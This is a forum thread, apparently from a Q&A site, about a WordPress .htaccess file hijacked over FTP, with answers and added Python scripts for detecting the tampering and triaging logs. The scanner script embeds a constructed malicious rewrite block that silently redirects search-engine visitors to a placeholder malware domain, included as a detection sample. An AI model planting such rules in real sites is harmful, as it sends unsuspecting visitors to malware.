.htaccess file hacked, how to prevent this in future? [closed]

The hacker added code to the .htaccess file to redirect all search engine traffic to a malware website. I am now investigating this incident and trying to find the security loopholes. My situation is almost the same as this person's: .htaccess being hacked repeatedly

Here's a sample of an intrusion attempt from the FTP logs:

    Aug  6 02:43:31 sg2nlftpg002 [30887]: ([email protected]) [INFO] FTPUSER is now logged in
    Aug  6 09:43:33 sg2nlftpg002 [30887]: ([email protected]) [NOTICE] /home/content/81/7838581/html//.htaccess downloaded  (846 bytes, 106.37KB/sec)
    Aug  6 09:43:35 sg2nlftpg002 [30887]: ([email protected]) [NOTICE] /home/content/81/7838581/html//.htaccess uploaded  (1435 bytes, 3.32KB/sec)
    Aug  6 09:43:35 sg2nlftpg002 [30887]: ([email protected]) [INFO] Logout.

This is significantly different from my regular login attempts:

    Aug  7 10:57:53 sg2nlftpg002 [11713]: session opened for local user FTPUSER from [my.ip.address]
    Aug  7 10:58:28 sg2nlftpg002 [11713]: [FTPUSER] close "/home/content/81/7838581/html/.htaccess" bytes read 1435 written 0
    Aug  7 11:14:29 sg2nlftpg002 [11713]: [FTPUSER] close "/home/content/81/7838581/html/.htaccess" bytes read 0 written 846
    Aug  7 11:14:55 sg2nlftpg002 [11713]: [FTPUSER] close "/home/content/81/7838581/html/.htaccess" bytes read 846 written 0
    Aug  7 12:08:03 sg2nlftpg002 [11713]: session closed for local user FTPUSER from [my.ip.address]

I have gone through the HTTP traffic logs but couldn't find anything suspicious there.

Other information that might be useful:

  • I am on a shared host and the website runs on WordPress, BuddyPress and other popular plugins.
  • To my knowledge, all software under my control is on the latest version and is updated regularly.
  • I use strong passwords and update them regularly. I only access the website with SFTP and SSH, using PuTTY.
  • My local machine is free from viruses.

My question is: how do I prevent such attacks in the future?

UPDATE

  • Please see report from Google - http://www.google.com/safebrowsing/diagnostic?site=ask-oracle.com
  • Another report related to network I am hosted on - http://www.google.com/safebrowsing/diagnostic?site=AS:26496
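As an added example (not part of the original question), the scanner below looks for the kind of rewrite block that implements "redirect all search engine traffic to a malware website" and diffs the file against a known-good copy. It assumes the usual shape of such an injection, a RewriteCond on HTTP_REFERER or HTTP_USER_AGENT matching a search-engine name followed by a RewriteRule to an external URL; the tampered sample and every domain name in it are constructed placeholders, and the baseline is the stock WordPress rewrite block.

```python
"""Scan a .htaccess file for search-engine-gated redirects and diff it against a
known-good copy. Added example for this thread, not code from the original
poster; the tampered rules below are constructed to illustrate the usual shape
of such a redirect, and every domain name is a placeholder.
"""
import difflib
import hashlib
import re

# Search-engine names commonly used in the gating condition (assumption).
SEARCH_ENGINES = re.compile(r"google|yahoo|bing|msn|yandex|baidu", re.I)

# Stock WordPress rewrite block, used here as the known-good baseline.
KNOWN_GOOD = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

# Constructed tampered copy: the baseline plus an injected redirect block.
TAMPERED = KNOWN_GOOD + """\
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*(google|yahoo|bing|msn)\\..*$ [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(googlebot|bingbot).*$ [NC]
RewriteRule ^(.*)$ http://malware.example/ [R=301,L]
</IfModule>
"""


def fingerprint(text: str) -> str:
    """SHA-256 of the file contents; record this for the known-good copy."""
    return hashlib.sha256(text.encode()).hexdigest()


def added_lines(baseline: str, current: str) -> list:
    """Lines present in the current file but absent from the baseline."""
    diff = difflib.ndiff(baseline.splitlines(), current.splitlines())
    return [d[2:] for d in diff if d.startswith("+ ")]


def scan_rewrite_rules(text: str) -> list:
    """Return (line_no, reason, target) for RewriteRules that send visitors off-site.

    A rule is rated 'search-engine-gated' when a RewriteCond preceding it tests
    HTTP_REFERER or HTTP_USER_AGENT against a search-engine name; that is the
    pattern behind 'redirect all search engine traffic' in the question.
    """
    findings = []
    pending = []  # RewriteCond lines seen since the last RewriteRule
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line.startswith("RewriteCond"):
            pending.append(line)
            continue
        if not line.startswith("RewriteRule"):
            continue
        parts = line.split()
        target = parts[2] if len(parts) > 2 else ""
        external = target.lower().startswith(("http://", "https://"))
        gated = any(
            ("HTTP_REFERER" in c or "HTTP_USER_AGENT" in c) and SEARCH_ENGINES.search(c)
            for c in pending
        )
        if external and gated:
            findings.append((n, "search-engine-gated external redirect", target))
        elif external:
            findings.append((n, "external redirect", target))
        pending = []  # a RewriteRule consumes the conditions before it
    return findings


if __name__ == "__main__":
    print("baseline sha256:", fingerprint(KNOWN_GOOD))
    for n, reason, target in scan_rewrite_rules(TAMPERED):
        print(f"line {n}: {reason} -> {target}")
    for added in added_lines(KNOWN_GOOD, TAMPERED):
        print("added:", added)
```

Run it against the live file from a cron job and alert when the fingerprint changes or the scanner returns anything; a plain "external redirect" can be legitimate (for example a redirect to the www hostname), so review those rather than treating them as automatic compromise.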

If they logged in over FTP, then your user account password is compromised and they're just FTPing up the modified file. Audit everywhere that's using your account password for password-collecting malware, then change the password to something secure. Also consider using a passwordless method of authentication (such as SSH public keys), but if your development machine is chock full of malware, it can just steal the key instead.
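The "if they logged in over FTP" premise can be checked mechanically. The following is an added example, not code from this answer: it parses the two log formats quoted in the question (the pure-ftpd style lines of the intrusion and the SFTP-subsystem style lines of the owner's own session), flags every plaintext FTP login, every login from a source outside an allowlist, and every write to .htaccess, and attributes each write to the source address of its session. The sample lines, addresses and account names are constructed placeholders.

```python
"""Triage FTP/SFTP logs for plaintext-FTP logins, logins from unexpected
sources, and writes to .htaccess. Added example for this thread, not code from
the answer above; the sample lines below are constructed to match the two
formats quoted in the question, with placeholder addresses and user names.
"""
import re
from dataclasses import dataclass
from pathlib import PurePosixPath

# Assumption: the owner only ever connects from this address (placeholder).
ALLOWED_SOURCES = {"198.51.100.7"}
WATCHED_FILES = {".htaccess"}

# Constructed lines modelled on the two excerpts in the question.
SAMPLE_LOG = """\
Aug  6 02:43:31 sg2nlftpg002 [30887]: (ftpuser@203.0.113.45) [INFO] FTPUSER is now logged in
Aug  6 09:43:33 sg2nlftpg002 [30887]: (ftpuser@203.0.113.45) [NOTICE] /home/content/81/7838581/html//.htaccess downloaded  (846 bytes, 106.37KB/sec)
Aug  6 09:43:35 sg2nlftpg002 [30887]: (ftpuser@203.0.113.45) [NOTICE] /home/content/81/7838581/html//.htaccess uploaded  (1435 bytes, 3.32KB/sec)
Aug  6 09:43:35 sg2nlftpg002 [30887]: (ftpuser@203.0.113.45) [INFO] Logout.
Aug  7 10:57:53 sg2nlftpg002 [11713]: session opened for local user FTPUSER from [198.51.100.7]
Aug  7 10:58:28 sg2nlftpg002 [11713]: [FTPUSER] close "/home/content/81/7838581/html/.htaccess" bytes read 1435 written 0
Aug  7 11:14:29 sg2nlftpg002 [11713]: [FTPUSER] close "/home/content/81/7838581/html/.htaccess" bytes read 0 written 846
Aug  7 12:08:03 sg2nlftpg002 [11713]: session closed for local user FTPUSER from [198.51.100.7]
"""

# Plaintext FTP daemon lines: "(user@host) [INFO] ACCT is now logged in" and transfers.
FTP_LOGIN = re.compile(r"\[(?P<pid>\d+)\]: \([^@)]*@(?P<host>[^)]+)\) \[INFO\] (?P<acct>\S+) is now logged in")
FTP_XFER = re.compile(r"\[(?P<pid>\d+)\]: \([^)]*\) \[NOTICE\] (?P<path>\S+) (?P<op>uploaded|downloaded)")
# SFTP subsystem lines: session open with source, and per-file close with byte counts.
SFTP_OPEN = re.compile(r"\[(?P<pid>\d+)\]: session opened for local user (?P<acct>\S+) from \[(?P<host>[^\]]+)\]")
SFTP_CLOSE = re.compile(r'\[(?P<pid>\d+)\]: \[[^\]]+\] close "(?P<path>[^"]+)" bytes read \d+ written (?P<written>\d+)')


@dataclass
class Finding:
    line_no: int
    kind: str
    source: str
    detail: str


def triage(log_text, allowed_sources=ALLOWED_SOURCES, watched=WATCHED_FILES):
    """Return findings in log order; writes are attributed to their session's source."""
    findings = []
    sessions = {}  # pid -> source host, recorded at login
    for n, line in enumerate(log_text.splitlines(), 1):
        if m := FTP_LOGIN.search(line):
            sessions[m["pid"]] = m["host"]
            # The owner says they only use SFTP, so any plaintext FTP login is suspect.
            findings.append(Finding(n, "plaintext-ftp-login", m["host"], m["acct"]))
            if m["host"] not in allowed_sources:
                findings.append(Finding(n, "login-from-unlisted-source", m["host"], m["acct"]))
        elif m := SFTP_OPEN.search(line):
            sessions[m["pid"]] = m["host"]
            if m["host"] not in allowed_sources:
                findings.append(Finding(n, "login-from-unlisted-source", m["host"], m["acct"]))
        elif m := FTP_XFER.search(line):
            if m["op"] == "uploaded" and PurePosixPath(m["path"]).name in watched:
                findings.append(Finding(n, "watched-file-written", sessions.get(m["pid"], "?"), m["path"]))
        elif m := SFTP_CLOSE.search(line):
            # "written > 0" on close means the file was modified over SFTP.
            if int(m["written"]) > 0 and PurePosixPath(m["path"]).name in watched:
                findings.append(Finding(n, "watched-file-written", sessions.get(m["pid"], "?"), m["path"]))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.kind} from {f.source} ({f.detail})")
```

On the constructed sample this reports the plaintext FTP login from the unlisted address, the .htaccess upload in that session, and the owner's own SFTP write when the file was restored; the last one is expected, which is why each finding carries its source so the two can be told apart.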


As already mentioned, the chances are that your FTP details have been compromised (normally from an infected Windows desktop PC somewhere, I've found).

I've tested this in the past by purposely logging in with the wrong password from a suspected PC, only to see someone else try to log in with the same wrong password 15 minutes later from a foreign IP address. Obviously the infected PC was sniffing the password and transmitting it back to the mother ship.

The most practical thing to do is restrict, on your firewall, where people can log in to FTP from. Password complexity or encryption will probably do you no good in this case, as the password is being stolen at source, and not being guessed or intercepted down the line.

In iptables something like this would work:

    # Drop plain-FTP (port 21) connections from every source except your own address
    iptables -I INPUT -p tcp --dport 21 ! -s X.X.X.X -j DROP

(where X.X.X.X is the IP of your office/home where you connect from).